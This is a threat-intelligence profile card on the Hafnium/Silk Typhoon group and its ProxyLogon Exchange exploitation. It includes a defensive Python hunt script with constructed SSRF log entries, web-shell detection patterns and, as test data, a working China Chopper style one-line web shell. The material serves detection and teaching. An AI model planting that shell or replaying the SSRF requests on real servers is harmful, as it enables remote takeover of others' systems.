Threat Intelligence Tarot
swords · 3
China (MSS-linked)
G0125 · ★★★★★
risk 5/5
✦ The Hidden Key ✦
Hafnium
HAFNIUM · Silk Typhoon
Targets: US Exchange servers · Law firms · Research universities · Defense contractors · NGOs
Active since ~2021 (publicly disclosed) · Infectious disease research, Defense industrial base access, Legal and policy intelligence
Microsoft disclosed four Exchange Server zero-days on a Tuesday (2 March 2021). Within days, web shells sat on an estimated quarter of a million Exchange servers worldwide. The Hidden Key was already inside before defenders could turn the lock.
Tactics & Techniques
ATT&CK tactics: Reconnaissance · Resource Development · Initial Access · Execution · Persistence · Privilege Escalation · Defense Evasion · Credential Access · Discovery · Lateral Movement · Collection · Command and Control · Exfiltration · Impact
Notable Operations
- ◆ ProxyLogon: exploitation of four Microsoft Exchange Server zero-days (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), March 2021
- ◆ An estimated 250,000+ Exchange servers compromised within days
- ◆ Mass web shell deployment on on-premises Exchange front ends before patches could be applied
- ◆ US Treasury Department breach (December 2024, attributed to Silk Typhoon)
Defenses
- ▸ Emergency patching SLA for Exchange and internet-facing systems · CIS Control 7
- ▸ Web shell detection and file integrity monitoring on IIS · NIST CSF: DE.CM
- ▸ Exchange server hardening and minimal internet exposure · Microsoft Exchange Security Guide
- ▸ Network segmentation isolating Exchange from internal systems · CIS Control 12
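The web shell detection defense above has two concrete checks behind it that an Exchange responder would actually run. The following Python is an added example, not code from the original page, from MITRE or from Microsoft; it shows both over constructed input. The first is the published HttpProxy log rule for the CVE-2021-26855 server-side request forgery: a request with an empty AuthenticatedUser whose AnchorMailbox matches ServerInfo~*/*. The second is a weighted scan of .aspx files under the documented ProxyLogon drop directories (FrontEnd\HttpProxy\owa\auth, FrontEnd\HttpProxy\ecp\auth, inetpub\wwwroot\aspnet_client) for the eval-the-request pattern used by China Chopper style shells. The column-reduced log rows, the file names, the indicator weights and the threshold are assumptions made for this example; real HttpProxy logs under ...\Exchange Server\V15\Logging\HttpProxy carry many more columns.

```python
"""Two ProxyLogon-era hunts on an Exchange front end (added example, constructed data)."""
import csv
import io
import os
import re
import shutil
import tempfile

# Constructed, column-reduced HttpProxy log. Only the columns the rule consults are kept.
SAMPLE_HTTPPROXY_LOG = """DateTime,RequestId,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox
2021-03-02T14:01:07.112Z,9a6f1e10,203.0.113.7,/owa/auth/logon.aspx,,
2021-03-02T14:02:33.910Z,9a6f1e11,198.51.100.12,/ecp/default.flt,,ServerInfo~a]@EXCH01.corp.example/autodiscover/autodiscover.xml?#
2021-03-02T14:03:41.004Z,9a6f1e12,10.0.4.22,/owa/,CORP\\jdoe,SMTP:jdoe@corp.example
2021-03-02T14:05:58.771Z,9a6f1e13,198.51.100.12,/ecp/y.js,,ServerInfo~localhost/ecp/DDI/DDIService.svc/SetObject?#
"""

# Regex form of the published glob 'ServerInfo~*/*'.
ANCHOR_SSRF = re.compile(r"^ServerInfo~[^/]*/.+", re.IGNORECASE)


def find_proxylogon_ssrf(log_text):
    """Rows with no authenticated user and a ServerInfo~ anchor: (DateTime, ClientIp, AnchorMailbox)."""
    hits = []
    for row in csv.DictReader(io.StringIO(log_text)):
        if row.get("AuthenticatedUser", "").strip():
            continue  # authenticated traffic is not the SSRF pattern
        anchor = row.get("AnchorMailbox", "")
        if ANCHOR_SSRF.match(anchor):
            hits.append((row["DateTime"], row["ClientIpAddress"], anchor))
    return hits


# Indicators weighted (assumed weights) by how rarely they appear in legitimate OWA/ECP pages.
SHELL_INDICATORS = [
    (re.compile(r"\beval\s*\(\s*Request", re.I), 5, "eval(Request...) China Chopper pattern"),
    (re.compile(r"Request\s*(\.Item)?\s*\[\s*[\"'][^\"']+[\"']\s*\]", re.I), 1, "reads a request parameter"),
    (re.compile(r"System\.Diagnostics\.Process|ProcessStartInfo|cmd\.exe", re.I), 4, "spawns a process"),
    (re.compile(r"Assembly\.Load\s*\(|FromBase64String", re.I), 3, "loads or decodes code at runtime"),
    (re.compile(r"Language\s*=\s*[\"']JScript[\"']", re.I), 2, "JScript page, unusual for Exchange"),
]

# Documented ProxyLogon web shell drop directories (matched case-insensitively as path suffixes).
SUSPECT_DIRS = (
    os.path.join("frontend", "httpproxy", "owa", "auth"),
    os.path.join("frontend", "httpproxy", "ecp", "auth"),
    os.path.join("inetpub", "wwwroot", "aspnet_client"),
)


def score_aspx(content):
    """Return (score, reasons) for one page's source text."""
    score, reasons = 0, []
    for pattern, weight, why in SHELL_INDICATORS:
        if pattern.search(content):
            score += weight
            reasons.append(why)
    return score, reasons


def scan_tree(root, threshold=4):
    """Walk root, score server-side pages, add a location bonus inside known drop dirs."""
    findings = []
    for dirpath, _, files in os.walk(root):
        in_drop_dir = any(d in dirpath.lower() for d in SUSPECT_DIRS)
        for name in files:
            if not name.lower().endswith((".aspx", ".asmx", ".ashx")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, reasons = score_aspx(fh.read())
            if in_drop_dir:
                score += 2
                reasons.append("in a known ProxyLogon drop directory")
            if score >= threshold:
                findings.append((os.path.relpath(path, root), score, reasons))
    return sorted(findings, key=lambda f: -f[1])


# Constructed page bodies: a China Chopper style shell and a benign page that reads a parameter.
CHOPPER = '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>'
LEGIT = '<%@ Page Language="C#" %><html><body><% Response.Write(Request["user"]); %></body></html>'


def demo_scan():
    """Build a throwaway tree mimicking FrontEnd\\HttpProxy\\owa\\auth and scan it."""
    root = tempfile.mkdtemp()
    drop = os.path.join(root, "FrontEnd", "HttpProxy", "owa", "auth")
    os.makedirs(drop)
    try:
        with open(os.path.join(drop, "errorEE.aspx"), "w") as fh:  # constructed shell name
            fh.write(CHOPPER)
        with open(os.path.join(drop, "logon.aspx"), "w") as fh:  # legitimate page name
            fh.write(LEGIT)
        return scan_tree(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for dt, ip, anchor in find_proxylogon_ssrf(SAMPLE_HTTPPROXY_LOG):
        print(f"[SSRF]  {dt} {ip} {anchor}")
    for rel, score, reasons in demo_scan():
        print(f"[SHELL] {rel} score={score}: {'; '.join(reasons)}")
```

The threshold matters: the legitimate logon.aspx also reads a request parameter and sits in the same directory, so it scores 3 and is not reported, while the shell scores 10 on the eval-the-request pattern alone before the location bonus. In a real engagement, pair the file scan with a hash baseline of the Exchange install so that any new or modified file under these directories is reviewed regardless of content.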
Reversed: Their Weakness
The mass exploitation of ProxyLogon was so broad and so fast that every other opportunistic actor piled onto the same four vulnerabilities; the noise of that follow-on exploitation helped incident responders separate Hafnium's earlier, more deliberate initial access from the crowd that came after.
Data sourced from MITRE ATT&CK. For educational purposes.